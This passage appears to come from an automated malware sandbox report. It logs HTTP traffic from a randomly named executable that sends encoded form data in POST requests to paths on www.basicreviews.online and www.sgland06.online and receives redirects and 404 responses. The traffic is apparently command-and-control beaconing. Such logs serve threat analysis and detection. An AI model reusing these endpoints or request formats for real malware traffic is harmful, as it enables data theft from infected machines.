                                                                                                                                                                              Data Ascii: 78=sJ/b/IKXRpCl1hxDMglwh/3f9n/3T6R5RQJ0LRUPgEkCT7E525+yAvCFcjUgUVGiqwlQU5Zu2+Y0vkI15jS1hAo9cX9pa139We4BfmPPtx36zZV9/WQ/9+qGlDkycC18TB7hqtMNLxfJuqIeZQVjOWjWWdw8BU4rc77Wc3/F8ozYkgbCmwA6Ktyq/rt1J/Z7XQ==
                                                                                                                                                                              Oct 31, 2024 01:40:26.690713882 CET1045INHTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:26 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              42192.168.2.450049144.76.190.39803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:28.374691010 CET751OUTPOST /3xn5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.basicreviews.online
                                                                                                                                                                              Referer: http://www.basicreviews.online/3xn5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 73 4a 2f 62 2f 49 4b 58 52 70 43 6c 36 67 68 44 4f 41 5a 77 31 76 33 59 6a 33 2f 33 5a 61 52 31 52 52 31 30 4c 55 6c 55 67 32 41 43 64 2b 34 35 33 34 2b 79 48 76 43 46 54 44 55 70 61 31 47 39 71 77 70 69 55 38 68 75 32 36 34 30 76 68 73 31 34 55 4f 30 68 51 6f 7a 64 6e 39 72 55 56 33 39 57 65 34 42 66 69 6e 31 74 78 50 36 7a 70 6c 39 74 48 51 77 38 2b 71 46 69 44 6b 79 59 43 31 34 54 42 37 54 71 73 51 33 4c 33 44 4a 75 72 34 65 65 42 56 73 5a 47 6a 55 4c 4e 77 74 49 33 56 54 53 34 57 6e 61 52 79 69 36 59 76 44 6c 6d 57 59 33 42 68 74 59 74 57 5a 69 73 6b 42 45 38 6b 79 4d 64 6a 45 59 67 62 76 30 74 59 5a 6c 6d 6a 45 68 51 41 56 42 6f 59 3d
                                                                                                                                                                              Data Ascii: 78=sJ/b/IKXRpCl6ghDOAZw1v3Yj3/3ZaR1RR10LUlUg2ACd+4534+yHvCFTDUpa1G9qwpiU8hu2640vhs14UO0hQozdn9rUV39We4Bfin1txP6zpl9tHQw8+qFiDkyYC14TB7TqsQ3L3DJur4eeBVsZGjULNwtI3VTS4WnaRyi6YvDlmWY3BhtYtWZiskBE8kyMdjEYgbv0tYZlmjEhQAVBoY=
                                                                                                                                                                              Oct 31, 2024 01:40:29.237567902 CET1045INHTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:29 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              43192.168.2.450050144.76.190.39803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:30.925148010 CET10833OUTPOST /3xn5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.basicreviews.online
                                                                                                                                                                              Referer: http://www.basicreviews.online/3xn5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 73 4a 2f 62 2f 49 4b 58 52 70 43 6c 36 67 68 44 4f 41 5a 77 31 76 33 59 6a 33 2f 33 5a 61 52 31 52 52 31 30 4c 55 6c 55 67 32 49 43 64 4c 30 35 31 62 57 79 47 76 43 46 4e 7a 55 6b 61 31 47 77 71 77 78 6d 55 38 38 5a 32 34 41 30 73 43 55 31 78 46 4f 30 71 51 6f 7a 59 58 39 6d 61 31 33 53 57 65 70 47 66 6d 44 31 74 78 50 36 7a 72 39 39 39 6d 51 77 78 65 71 47 6c 44 6b 41 63 43 31 51 54 42 7a 70 71 73 56 4b 4c 42 7a 4a 75 4c 6f 65 66 7a 39 73 47 32 6a 53 49 4e 78 77 49 33 5a 4d 53 35 37 59 61 52 76 46 36 61 7a 44 6b 6e 76 67 73 51 46 71 4e 2f 2b 51 2b 62 34 46 41 4d 74 72 55 76 6d 38 64 53 37 55 73 75 34 62 69 6e 61 67 39 43 30 32 55 64 7a 6a 6d 72 67 74 74 71 31 57 62 61 37 59 73 52 5a 71 74 73 69 5a 66 4a 30 54 50 74 41 70 38 49 46 6a 75 77 2f 4b 6a 77 49 42 2f 38 4f 7a 65 4c 59 62 61 39 39 4c 72 76 48 54 79 79 59 35 62 48 31 4b 62 47 54 4f 2b 73 34 79 34 64 6b 72 33 6c 62 66 44 2f 33 50 35 74 42 37 76 47 72 46 48 2b 2b 4a 5a 73 31 49 6d 41 4f 72 46 38 6b 32 53 39 68 34 4c 79 51 4c 59 71 7a [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=sJ/b/IKXRpCl6ghDOAZw1v3Yj3/3ZaR1RR10LUlUg2ICdL051bWyGvCFNzUka1GwqwxmU88Z24A0sCU1xFO0qQozYX9ma13SWepGfmD1txP6zr999mQwxeqGlDkAcC1QTBzpqsVKLBzJuLoefz9sG2jSINxwI3ZMS57YaRvF6azDknvgsQFqN/+Q+b4FAMtrUvm8dS7Usu4binag9C02Udzjmrgttq1Wba7YsRZqtsiZfJ0TPtAp8IFjuw/KjwIB/8OzeLYba99LrvHTyyY5bH1KbGTO+s4y4dkr3lbfD/3P5tB7vGrFH++JZs1ImAOrF8k2S9h4LyQLYqz9kxSRtoZQlORAUgKe3EDbOdewEZkyOJLwzdObdCgkNhacafYOSr/GVHnpWf8QYpoNkIDhUjou+sYnLIkbi48UbigHRZUHys++vVJGzNy0q/MZmdUMrVoahNTGW2W6nixdMsk6M7zSnxE1WNKgwLTs2Zy8x5cFnBGuSc2aLk7Yanzk+RuAQW2A5UDfpHgKke8RkM/mDVB0Z5uPWkSeyRGUFIaCYIRuwg9OFswDxY5/S0AnGhrgAhYS2EmgYcDA2lb4cTnGwFfwq7XqHpt/o6Gg786ThG9n85R9VCfIGVBG+s2iCuIZGCLxgEfATvTZlqpHuSFbOfOa5DBQ9Z+Eu14UOpZVXJqfmcjpqCjvUW0U9QKE3OJrR3Awe3RTezmndU6XJZHV+Z+0zNRPlPafYEAYHId1fPWvQXuTrGEgikq5sOIbYHlhDy4p9yrSmzfe3nv7GxfZBEIakA62V+xfkFIxmbJaQIFb6W+3yim5UxC4vzccLeh3flH959ueWfMRCpupWfkUc5ZcjWXvjRD1UCADSaSroGj9ElNAl4yEV3fBPRAF7+XnKmIT5d5aU3ewePi5MsxKx0xKSOow6fJPUq5h3srqkt0E8pY6jMjsi7O1VXEEyMMWdvexEpuCc5ZcT2utpVvHS0sho6btj0QLsgf08lWGMh8rAiLS7 [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:40:31.773847103 CET1045INHTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:31 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              44192.168.2.450051144.76.190.39803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:33.467539072 CET458OUTGET /3xn5/?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:40:34.328188896 CET1191INHTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:34 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&hrOd=1DzdIBZXhZaHw2Wp
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              45192.168.2.45005234.92.128.59803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:39.526362896 CET719OUTPOST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4e 61 6d 2f 44 66 57 57 37 50 39 48 61 4b 78 48 30 74 54 44 43 77 6c 4d 72 58 45 43 2f 4d 74 6f 6e 34 6a 68 36 62 31 68 7a 31 70 4a 52 52 47 38 30 6c 63 46 64 4e 41 77 6d 63 46 46 6a 31 74 61 4a 66 74 6c 45 31 4d 34 38 6e 70 33 36 4e 4e 70 79 31 57 54 78 68 6d 6d 64 31 6b 43 74 6a 38 44 30 6a 67 57 34 31 63 32 6f 6b 58 41 44 50 2f 69 70 36 49 6b 6e 38 73 56 70 4c 43 54 4e 36 59 2f 37 49 47 6d 5a 6a 51 35 76 41 31 4e 68 31 31 55 65 71 63 76 6e 35 6c 5a 71 6f 32 6e 64 70 55 46 4c 61 43 32 7a 79 7a 31 6f 42 6e 41 38 59 48 68 6f 33 2b 52 69 49 44 39 76 4d 77 2b 49 6c 66 79 5a 41 3d 3d
                                                                                                                                                                              Data Ascii: 78=Nam/DfWW7P9HaKxH0tTDCwlMrXEC/Mton4jh6b1hz1pJRRG80lcFdNAwmcFFj1taJftlE1M48np36NNpy1WTxhmmd1kCtj8D0jgW41c2okXADP/ip6Ikn8sVpLCTN6Y/7IGmZjQ5vA1Nh11Ueqcvn5lZqo2ndpUFLaC2zyz1oBnA8YHho3+RiID9vMw+IlfyZA==
                                                                                                                                                                              Oct 31, 2024 01:40:40.504628897 CET833INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:40 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HaBDA6u5OAiLgOO3iitkTWt7Gzk3nlOpUZdWmStgVbKi76Dk70lYeB8WTo4t%2FTwQoV5A9CUBjDtEMHJ3XbrGWzR47KgsUF5nr7uiegTWjJdJIm%2BfR4PfpnWzcPuiLofp4LcwS35M%2FkrxAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1754&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              46192.168.2.45005334.92.128.59803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:42.070611954 CET739OUTPOST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4e 61 6d 2f 44 66 57 57 37 50 39 48 62 71 68 48 6e 63 54 44 56 67 6b 2b 6c 33 45 43 78 73 74 73 6e 34 76 68 36 65 56 78 7a 6d 64 4a 49 30 36 38 31 6e 34 46 54 74 41 77 73 38 46 41 74 56 74 52 4a 66 52 44 45 78 4d 34 38 6e 74 33 36 4e 39 70 75 53 36 55 77 78 6d 6b 57 56 6b 41 6e 44 38 44 30 6a 67 57 34 78 30 59 6f 6e 6e 41 43 2f 76 69 76 72 49 6a 35 73 73 57 6a 72 43 54 4a 36 59 37 37 49 47 45 5a 6e 5a 53 76 43 4e 4e 68 33 74 55 65 62 63 73 75 35 6c 66 30 59 32 31 58 4b 35 39 54 62 2f 56 39 6b 72 41 6e 79 4c 42 77 2b 4b 37 35 47 66 47 77 49 6e 4f 79 4c 35 4b 46 6d 69 37 43 4f 32 4b 36 31 59 57 6a 38 38 45 39 5a 4c 35 6b 66 78 56 4a 63 77 3d
                                                                                                                                                                              Data Ascii: 78=Nam/DfWW7P9HbqhHncTDVgk+l3ECxstsn4vh6eVxzmdJI0681n4FTtAws8FAtVtRJfRDExM48nt36N9puS6UwxmkWVkAnD8D0jgW4x0YonnAC/vivrIj5ssWjrCTJ6Y77IGEZnZSvCNNh3tUebcsu5lf0Y21XK59Tb/V9krAnyLBw+K75GfGwInOyL5KFmi7CO2K61YWj88E9ZL5kfxVJcw=
                                                                                                                                                                              Oct 31, 2024 01:40:43.058741093 CET833INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:42 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n44l2GrAdPQ0zSKfCFTruPRhdLcZAiL19XAF4s6HM7j7Z%2Boipc77%2B7F3rlGczdjpJW3B2eO8Vv4FUGBbscOKfTOLkrLMZz42oCtvP8btoq34B6A%2B2rycEueLohmVCJG3OUKKpI49YwfMqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
